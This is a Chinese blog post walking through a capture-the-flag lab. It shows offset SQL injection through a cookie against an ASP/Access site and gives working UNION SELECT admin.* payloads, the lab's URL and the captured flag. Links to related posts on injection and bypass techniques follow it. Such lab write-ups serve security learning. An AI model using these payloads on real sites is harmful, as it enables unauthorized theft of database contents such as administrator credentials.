[zkaq靶场]SQL注入--access数据库-偏移注入

最新推荐文章于 2023-10-09 12:10:43 发布
最新推荐文章于 2023-10-09 12:10:43 发布
阅读量386 收藏 3
点赞数 1
分类专栏: zkaq靶场 文章标签: sql sql注入 access 移位注入 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116545336
版权

Access注入–偏移注入

适用场景:

当使用select * from adminselect admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。

union select 1,2,3,admin.* ,4,5,6 from admin

通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。

靶场

image-20210423190308583

该处的sql注入为access数据库-cookie注入的漏洞点。

偏移注入的漏洞点在:

image-20210423190446845

由于admin表里新增了一个字段,无法通过爆破得出,所以在此处我们使用偏移注入。

判断列数

通过order by 判断出有26个字段

image-20210423190847980

并且也是cookie注入,在url不允许传入非法字符。

判断回显点:

document.cookie=‘id=’+escape(“105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin”)

image-20210423193926582

此处明显的回显点是3,5,7,但是通过查看页面源代码发现还要25的回显点。

image-20210423194121773

所以回显点一共是3,5,7,25。

然后判断admin.*的列数。

url:http://59.63.200.79:8004/ProductShow.asp?

document.cookie=‘id=’+escape(“105 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin.* from admin”)

页面不正常:

image-20210423195842422

document.cookie=‘id=’+escape(“105 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin”)

页面正常,可以判断admin表有16个字段。

document.cookie=‘id=’+escape(“105 and 1=2 union select 1,2,3,4,5,6,7,8,9,admin.*,10 from admin”):获得最后admin表最后一个字段的数据,因为25是回显点。

image-20210423200139802

得到flag。zkaq{f0e12dafb6}

wwxxee
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Access注入之cookie注入(含靶场练习)
weixin_60777183的博客
08-31 637
一.cookie注入简介 Access → 数据库的一种。除了Access,还有mysql,mssqlsql server),Oracle等 cookie注入→特殊的传参方式产生的注入。所以cookie注入只跟传参方式有关,跟别的一概没有关系。 什么是Cookie?Cookie是代表身份信息的一串字符串,网站根据Cookie来识别你是谁,如果获取了管理员的Cookie,可以无需密码直接登录管理员的账号。类似门禁卡、身份证。 二.怎么修改cookie 1.方法一:浏览器修改(不推荐) 浏..
渗透测试---手把手教你SQL注入(7)---Access数据库注入
weixin_52796034的博客
10-16 519
在讨论SQL注入中的Access数据库注入时,首先需要了解Access数据库的一些基本知识。Microsoft Access 是一种关系型数据库管理系统,可用于存储、管理和检索数据。虽然Access通常用于较小的数据库和单服务器环境,但它也可以用于大型企业和互联网应用。 此外,Access与其他数据库管理系统(如MySQLSQL Server等)在处理SQL注入方面有所不同。
【网络安全 ---- 靶场搭建】凡诺企业网站管理系统靶场详细搭建过程(asp网站,练习Access数据库sql注入
m0_67844671的博客
10-09 1368
【网络安全 ---- 靶场搭建】凡诺企业网站管理系统靶场详细搭建过程(asp网站,练习sql注入
文件上传---zkaq
weixin_38237216的博客
04-02 245
一.文件上传概念 黑名单绕过 1.后缀检测(最常见的检测方式)----根据后缀来决定用什么东西来处理这个文件 2.Content-type .php =>phtml php3 php4 php5 .htaccess => 分布式配置文件 Windows 文件与文件夹都不区分大小写 .php .Php Windows 会自动去除后缀末尾的空格 .php .php空格 windows会自动去除后缀末尾的. .php .php…… Windows文件流绕过(NTFS格式)123.txt:a.txt
变量覆盖 --- zkaq
weixin_38237216的博客
04-27 1926
1.概念 1.变量覆盖:变量覆盖指的是可以用我们的传参值替换程序原有的变量值 2.常见的变量覆盖的危险函数 extract()函数:将数组中变成变量 举例:<?php $a = “1”; $my_array = array(“a” => “Cat”,“b” => “Dog”, “c” => “Horse”); extract($my_array); echo “$a = $a; $b = $b; $c = $c”; ?> 运行结果:$a = Cat; $b = Dog; $
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
mysql注入-sqlilabs靶场注入
10-15
SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,甚至完全控制数据库服务器。本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sql-lap注入靶场
05-02
这个"sql-lap注入靶场"是专门为学习和实践SQL注入漏洞而设计的一个平台。在这个靶场中,你可以模拟黑客攻击,体验如何利用SQL注入来破解系统,同时也能够提升你的安全防护意识和技能。 SQL注入攻击的基本原理是,...
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
渗透学习测试网站源码打包带走
05-24
渗透学习测试网站源码打包带走。asp+access注入源码;cookie注入源码;DVWA漏洞平台测试源码;ewebeditor;fck漏洞源码;fck突破“_”源码;iis6.0解析漏洞源码;phpcms2008;php包含漏洞源码;WEBSHELL箱子系统V2.0;xss漏洞测试源码;搜索注入源码;制作高级webshell后门附带工具。
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
SQL手工注入漏洞测试—Access数据库(墨者学院靶场
ISNS的博客
07-09 1476
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
适用于ACCESS和MySQL数据库偏移注入
qq_42097777的博客
04-01 449
## 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询,偏移注入同样如此 # 偏移注入还要用到"table.*" 他的意思是代表了表里的所有字段 ###运用场景是:权限不足无法获取系统表内的信息,和工具无法查出字段 先判断是否有注入点,靶场第一题,用url传参被拒绝,采用cookie进行传参 1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有...
[zkaq靶场]逻辑漏洞--验证码绕过(UsualToolCMS)
wwxxee
05-09 2658
逻辑漏洞–验证码绕过、密码找回漏洞 验证码绕过的常用姿势: 一、前端验证验证码,并没有后端验证。直接抓包然后进行跑数据包,反正有没有验证码的阻碍 二、验证码设置了但是并没有效验,乱输验证码也能够成功的登录 三、验证码可以重复使用,比如现在的验证码1111,然后虽然你登录失败后验证码会变,但是你输入1111他却判定你验证码正确(常见)https://www.uedbox.com/post/14207/ 四、.验证码空值绕过,比如,我们现在抓一个包,发现登录参数是user=admin&password=
靶场(3)
HJWYYQX的博客
06-15 283
FTP服务后门 同样开始用netdiscover发现靶机ip后,用nmap探测开启的端口或服务。 发现开启了ssh,http和ftp这三个服务。 我们发现了ftp的版本号,我们可以使用seachsploit来查看对应的版本该服务有没有可利用的漏洞。 发现了利用漏洞,并且列出了集成利用方式(Metasploit)和利用代码位置(15662.txt) 接下来使用Metasploit进行溢出(...
SQL注入-针对asp+access网站进行SQL注入
qq_25899635的博客
05-23 4955
asp+access网站技术介绍   ASP即Active Server Pages,是MicroSoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASp文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本标志语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也...
Access注入--偏移注入
weixin_45922278的博客
10-17 247
Access注入--偏移注入 Access偏移注入:知道表名,不知道字段名. 核心:tables_name.* 题目:http://59.63.200.79:8004/ 1.http://59.63.200.79:8004/ProductShow.asp?id=104 #去除id=104,通过cookie传参 #http://59.63.200.79:8004/...
【实战渗透】对 ACCESS 偏移注入实战(针对爆不出字段名)
V1040375575的博客
09-08 480
ACCESS偏移注入记录 Access偏移注入原理,基本公式为: order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案; 也就是: orderby = 22 * = 6个字符 2 × * = 12个字符 22 - 12 = 10个字符 注入点: www.xxx.com/Newsview.asp?id=832 查询字段数: www.xxx.com/Newsview.asp?id=832order by 16回显正常...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值